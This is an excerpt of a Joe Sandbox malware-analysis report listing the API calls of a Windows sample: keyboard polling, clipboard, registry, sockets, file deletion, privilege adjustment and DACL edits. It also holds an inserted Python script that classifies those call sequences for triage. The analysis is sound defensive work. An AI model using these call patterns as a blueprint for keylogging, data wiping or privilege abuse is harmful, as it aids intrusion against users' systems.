                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5514BB590020DABDF14DF94DC48EFEBBB9FF05304F088129EA15AB290D7749A05DB61
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-4052911093
• Opcode ID: 81bad41a8f606cd410cce30b84c6030753f513dd1775f53f80c394906dd9ad9d
• Instruction ID: eeec464c0f4962689e8edbe2097f41c47ddae086d43e73216af5e3ac19b2673a
• Opcode Fuzzy Hash: 81bad41a8f606cd410cce30b84c6030753f513dd1775f53f80c394906dd9ad9d
• Instruction Fuzzy Hash: 60728271E04219DBDB18CF58C980BAEBBB5BF44310F54816AE855FB281DB719E81EF90
APIs
  • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F05FA6,?), ref: 00F06ED8
  • Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
• _wcscat.LIBCMT ref: 00F06441
• __wsplitpath.LIBCMT ref: 00F0645F
• FindFirstFileW.KERNEL32(?,?), ref: 00F06474
• _wcscpy.LIBCMT ref: 00F064A3
• _wcscat.LIBCMT ref: 00F064B8
• _wcscat.LIBCMT ref: 00F064CA
• DeleteFileW.KERNEL32(?), ref: 00F064DA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F064EB
• FindClose.KERNEL32(00000000), ref: 00F06506
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
• String ID: \*.*
• API String ID: 2643075503-1173974218
• Opcode ID: 1370fb4b1179e7c35704923c5b4ee633e34617626576d2b1808312ae2e6d7816
• Instruction ID: 4ae2fb5eb846c2bb073f826f9a8d6e65f65a8d593dfc72ee151214ec262c6582
• Opcode Fuzzy Hash: 1370fb4b1179e7c35704923c5b4ee633e34617626576d2b1808312ae2e6d7816
• Instruction Fuzzy Hash: 983184B2408388AAC721DBA48C85ADFB7DCAF96310F44091EF6D8C3181EA35D549A767
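The three "APIs" listings in this part of the report (the GetUserObjectSecurity/AddAce/SetUserObjectSecurity function above, the FindFirstFileW/DeleteFileW loop over `\*.*` just listed, and the RegConnectRegistryW/RegQueryValueExW function that follows) are easier to triage as ordered API sequences than as raw bullets. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the listing format as rendered here (bullet, optional "Part of subcall function" prefix, `API.MODULE(args), ref: addr`; arguments the disassembler could not resolve are shown as `?`), matches each function against ordered API subsequences, and decodes the few constant arguments that are meaningful (for example the `00000004` passed to SetUserObjectSecurity is `DACL_SECURITY_INFORMATION`, and `00000002` with length `0000000C` in GetAclInformation is `AclSizeInformation`). The sample inputs are copied from the listings above; the rule names and the constant table are my own labels, taken from the Win32 SDK headers. Note for the DACL function: editing a user object's DACL by reading the existing ACL, appending ACEs for a copied SID and writing it back is also the documented Windows pattern for granting another account access to a window station and desktop, which is plausible runtime code given the "compiled AutoIt script" verdict above; that is an assessment, not something the report states.

```python
"""Parse Joe Sandbox "APIs" function summaries and flag behaviour patterns.

Added example for this report; not Joe Sandbox code and not from the sample.
"""
import re
from collections import namedtuple

Call = namedtuple("Call", "api module args ref subcall")

# One report line. Unresolved arguments are rendered as "?" in the report.
LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]+):\ )?
        (?P<api>\w+)\.(?P<mod>\w+)
        (?:\((?P<args>[^)]*)\))?
        ,?\ ref:\ (?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)

# Sample input: lines copied from the listings in this report (a subset of each).
DACL_FUNC = """
  • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
  • Part of subcall function 00EFAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EFA6B5,?), ref: 00EFAC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EFA6D0
• _memset.LIBCMT ref: 00EFA6E5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EFA704
• GetAce.ADVAPI32(?,00000000,?), ref: 00EFA752
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EFA76E
• CopySid.ADVAPI32(00000000), ref: 00EFA7C9
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EFA7FA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EFA820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EFA834
"""
DELETE_FUNC = """
• FindFirstFileW.KERNEL32(?,?), ref: 00F06474
• _wcscat.LIBCMT ref: 00F064B8
• DeleteFileW.KERNEL32(?), ref: 00F064DA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F064EB
• FindClose.KERNEL32(00000000), ref: 00F06506
"""
REG_FUNC = """
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F2328E
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F2332D
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F233C5
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F23604
"""

# Behaviour rules: ordered API subsequences (gaps allowed). Labels are mine.
RULES = {
    "user-object DACL rewrite": (
        "GetUserObjectSecurity", "GetSecurityDescriptorDacl", "AddAce",
        "SetSecurityDescriptorDacl", "SetUserObjectSecurity"),
    "wildcard file deletion loop": (
        "FindFirstFileW", "DeleteFileW", "FindNextFileW", "FindClose"),
    "registry value read via RegConnectRegistry": (
        "RegConnectRegistryW", "RegQueryValueExW", "RegCloseKey"),
}

# Constant arguments worth decoding (0-based position), per the Win32 SDK headers.
KNOWN_ARGS = {
    ("SetUserObjectSecurity", 1): {"00000004": "DACL_SECURITY_INFORMATION"},
    ("GetAclInformation", 3): {"00000002": "AclSizeInformation"},
    ("InitializeSecurityDescriptor", 1): {"00000001": "SECURITY_DESCRIPTOR_REVISION"},
    ("SetSecurityDescriptorDacl", 1): {"00000001": "bDaclPresent=TRUE"},
}


def parse_apis(text):
    """Return calls in listing order; subcall lines are kept, they sit at their call site."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def is_subsequence(needle, haystack):
    """True if every item of needle occurs in haystack in that order (gaps allowed)."""
    it = iter(haystack)
    return all(item in it for item in needle)


def classify(text):
    """Parse one listing, report matched behaviour rules and decoded constant arguments."""
    calls = parse_apis(text)
    apis = [c.api for c in calls]
    behaviours = [name for name, seq in RULES.items() if is_subsequence(seq, apis)]
    decoded = []
    for c in calls:
        for i, arg in enumerate(c.args):
            label = KNOWN_ARGS.get((c.api, i), {}).get(arg)
            if label:
                decoded.append(f"{c.api}@{c.ref} arg{i}={arg} ({label})")
    return {"calls": len(calls), "apis": apis, "behaviours": behaviours, "decoded": decoded}


if __name__ == "__main__":
    for name, text in (("DACL", DACL_FUNC), ("DELETE", DELETE_FUNC), ("REG", REG_FUNC)):
        r = classify(text)
        print(name, r["behaviours"], *r["decoded"], sep="\n  ")
```

The subsequence match deliberately allows gaps, because the listing interleaves CRT helpers (`_memset`, `_wcscat`) and heap calls with the calls that matter; tightening it to adjacency would miss the DACL edit above. Keep the decode table small and only for constants you can verify against the headers: `?` entries are unresolved, not zero, and values such as the `000000FF` index argument to AddAce should not be guessed at.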
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F2328E
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F2332D
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F233C5
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F23604
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F23611
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
APIs
• GetKeyboardState.USER32(?), ref: 00F02B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00F02BE0
• GetKeyState.USER32(000000A0), ref: 00F02BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00F02C15
• GetKeyState.USER32(000000A1), ref: 00F02C2A
• GetAsyncKeyState.USER32(00000011), ref: 00F02C42
• GetKeyState.USER32(00000011), ref: 00F02C54
• GetAsyncKeyState.USER32(00000012), ref: 00F02C6C
• GetKeyState.USER32(00000012), ref: 00F02C7E
• GetAsyncKeyState.USER32(0000005B), ref: 00F02C96
• GetKeyState.USER32(0000005B), ref: 00F02CA8
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00EF9ABF: CLSIDFromProgID.OLE32 ref: 00EF9ADC
  • Part of subcall function 00EF9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00EF9AF7
  • Part of subcall function 00EF9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00EF9B05
  • Part of subcall function 00EF9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EF9B15
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F1C235
• _memset.LIBCMT ref: 00F1C242
• _memset.LIBCMT ref: 00F1C360
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00F1C38C
• CoTaskMemFree.OLE32(?), ref: 00F1C397
Strings
• NULL Pointer assignment, xrefs: 00F1C3E5
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
  • Part of subcall function 00EFB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
  • Part of subcall function 00EFB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
  • Part of subcall function 00EFB134: GetLastError.KERNEL32 ref: 00EFB1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00F07A0F
Strings
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                                                                                                                                                      • Opcode ID: afc75116bb70373336fe824e5285df4778c64548221fc6366e0a40504d5f95d8
                                                                                                                                                                                                                                                      • Instruction ID: 5b248b68d086f5825d02db0283fba0a184cdac0754913209c8d0fc3e4f857ab4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afc75116bb70373336fe824e5285df4778c64548221fc6366e0a40504d5f95d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F01F772F583156AF7287668DC5ABBF33589B00750F2448A4FD43E20E2D9A8BF00B1B1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00F18CA8
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18CB7
                                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00F18CD3
                                                                                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00F18CE2
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18CFC
                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00F18D10
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279440585-0
                                                                                                                                                                                                                                                      • Opcode ID: e490d61479b55a528a67864f299ffc0bfd907789322a7fb72a621612f0a1362e
                                                                                                                                                                                                                                                      • Instruction ID: 5c729da1bde5349f4693ebb31760d744549b8a9480ed72a983985d06fb0e1636
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e490d61479b55a528a67864f299ffc0bfd907789322a7fb72a621612f0a1362e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2521E4356002059FCB14EF68DE45BAEB7E9EF59360F10415CF916A73D2CB30AD42AB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F06554
                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F06564
                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F06583
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F065A7
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F065BA
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F065F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1605983538-0
                                                                                                                                                                                                                                                      • Opcode ID: 088fde006004de28ab5e24e32a8d4000e2b16c6eb2d706ff1788d401ebb10460
                                                                                                                                                                                                                                                      • Instruction ID: e0325e5f0001c9e015c1b8032ba22927673709078351c8aa560bebdfb8509a0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 088fde006004de28ab5e24e32a8d4000e2b16c6eb2d706ff1788d401ebb10460
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65218671A00258ABDB20ABA4CC88BEDB7FCAB45310F5400A5E905E3181DB719F85EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F1A82C: inet_addr.WSOCK32(00000000), ref: 00F1A84E
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00F19296
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00F192B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4170576061-0
                                                                                                                                                                                                                                                      • Opcode ID: 8568d24f5f30a4e0aff6088dca55876c1d99ab9cfc6ba4f3d2daaf3b55ba4db0
                                                                                                                                                                                                                                                      • Instruction ID: 1ce9eb4e7d7a57cc94ed185a4e68b0df55b9387f69a831541b73c2d09931f149
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8568d24f5f30a4e0aff6088dca55876c1d99ab9cfc6ba4f3d2daaf3b55ba4db0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7841DD70600204AFDB14AB688D92F7EB7EDEF44324F14854DF956AB3C2CBB49D029B91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F0EB8A
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0EBBA
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0EBCF
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F0EBE0
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F0EC0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                                                                                                      • String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00EDE014,74DF0AE0,00EDDEF1,00F5DC38,?,?), ref: 00EDE02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EDE03E
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F013DC
Similarity
• API ID: lstrlen
• String ID: ($|
APIs
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00EDB22F
  • Part of subcall function 00EDB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EDB5A5
Similarity
• API ID: Proc$LongWindow
• String ID:
                                                                                                                                                                                                                                                      • API String ID: 2749884682-0
                                                                                                                                                                                                                                                      • Opcode ID: 77df11707267e470a246b19e101e6b545033e0b6c5cbadb83f53f91a5e98275d
                                                                                                                                                                                                                                                      • Instruction ID: 770fe612955677772d02ce590a58dd35da9ae707e26026ee4ff0f8ae207ac50f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77df11707267e470a246b19e101e6b545033e0b6c5cbadb83f53f91a5e98275d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAA12661514005FEDA28AA699C88EBF396CEF56364F16522FF441F63E1FB149C03B272
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F143BF,00000000), ref: 00F14FA6
                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F14FD2
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: b49060730eb77749763ad4bc79080adaa98770649adb59fb56ad944b75ab5b55
• Instruction ID: 4ce21896602f6ebd2caae34737ea6cac8ad670cb2663928ded593b10ce13c218
• Opcode Fuzzy Hash: b49060730eb77749763ad4bc79080adaa98770649adb59fb56ad944b75ab5b55
• Instruction Fuzzy Hash: 9241B77290460AFFEB20DE94DC85FFB77BCEB80764F10402EF60567281D671AE85A690
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F0E20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F0E267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F0E2B4
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: b1fbac41b751decdeed042f654b315805cfcca932379b8f98769a5c6bd39ba71
• Instruction ID: 3d55003b9d048545992c9b3aade8e043266b764e02627a619bc3309274197d1a
• Opcode Fuzzy Hash: b1fbac41b751decdeed042f654b315805cfcca932379b8f98769a5c6bd39ba71
• Instruction Fuzzy Hash: A2214A35A00118EFCB00EFA5D984AADFBF8FF99314F0484AAE905A7391DB319906DB50
APIs
  • Part of subcall function 00EDF4EA: std::exception::exception.LIBCMT ref: 00EDF51E
  • Part of subcall function 00EDF4EA: __CxxThrowException@8.LIBCMT ref: 00EDF533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
• GetLastError.KERNEL32 ref: 00EFB1BA
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 981e0b9b3b1766ab6ee469eb8e590d44bb4e08970f9c0a825cfa4fc90aba33af
• Instruction ID: 89e1b891c7066c021c91ce7539f9b1268c3c3f0187c6714ebe5a6f83613309c4
